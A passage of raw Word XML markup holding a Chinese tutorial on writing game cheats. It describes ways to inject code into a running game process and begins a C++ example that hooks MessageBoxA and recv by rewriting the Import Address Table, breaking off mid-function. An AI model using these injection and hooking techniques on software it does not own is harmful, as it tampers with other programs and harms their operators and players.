        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、注入外挂代码进入被挂游戏进程中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　完成了定位和修改程序中调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数代码后，我们就可以随意设计自定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的替代函数了。做完这一切后，还需要将这些代码注入到被外挂游戏程序进程内存空间中，不然游戏进程根本不会访问到替代函数代码。注入方法有很多，如利用全局钩子注入、利用注册表注入挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数、利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CreateRemoteThread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入（仅限于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NT/2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BHO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入等。因为我们在动作模拟技术一节已经接触过全局钩子，我相信聪明的读者已经完全掌握了全局钩子的制作过程，所以我们在后面的实例中，将继续利用这个全局钩子。至于其它几种注入方法，如果感兴趣可参阅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有关内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　有了以上理论基础，我们下面就开始制作一个挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MessageBoxA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的实例，在开发游戏外挂程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，可以此实例为框架，加入相应的替代函数和处理代码即可。此实例的开发过程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开前面创建的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中加入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HOOKAPI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构，此结构用来存储被挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数名称、原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数地址和替代函数地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">typedef struct tag_HOOKAPI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LPCSTR szFunc;//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HOOK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数名称。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PROC pNewProc;//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替代函数地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PROC pOldProc;//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">}HOOKAPI, *LPHOOKAPI; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.cpp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，首先加入一个函数，用于定位输入库在输入数据段中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">extern "C" __declspec(dllexport)PIMAGE_IMPORT_DESCRIPTOR </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LocationIAT(HMODULE hModule, LPCSTR szImportMod) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hModule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为进程模块句柄；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>szImportMod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为输入库名称。</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查是否为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序，如是返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIMAGE_DOS_HEADER pDOSHeader = (PIMAGE_DOS_HEADER) hModule; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if(pDOSHeader-&gt;e_magic &amp;#33;= IMAGE_DOS_SIGNATURE) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">return NULL; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查是否为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标志，否则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS)((DWORD)pDOSHeader+ (DWORD)(pDOSHeader-&gt;e_lfanew)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if(pNTHeader-&gt;Signature &amp;#33;= IMAGE_NT_SIGNATURE) return NULL; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if(pNTHeader-&gt;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress == 0) return NULL; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定位第一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位置。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIMAGE_IMPORT_DESCRIPTOR pImportDesc = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD)pDOSHeader + (DWORD)(pNTHeader-&gt;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据输入库名称循环检查所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如匹配则返回该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，否则检测下一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">while (pImportDesc-&gt;Name)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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述的输入库名称。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PSTR szCurrMod = (PSTR)((DWORD)pDOSHeader + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(DWORD)(pImportDesc-&gt;Name)); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">if (stricmp(szCurrMod, szImportMod) == 0) break; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pImportDesc++;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 xml:space="preserve">if(pImportDesc-&gt;Name == NULL) return NULL; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">return pImportDesc; </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再加入一个函数，用来定位被挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项并修改其内容为替代函数地址。代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">extern "C" __declspec(dllexport) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HookAPIByName( HMODULE hModule, LPCSTR szImportMod, LPHOOKAPI pHookApi) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hModule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为进程模块句柄；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>szImportMod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为输入库名称；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pHookAPI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HOOKAPI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构指针。</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>szImportMod</w:t>
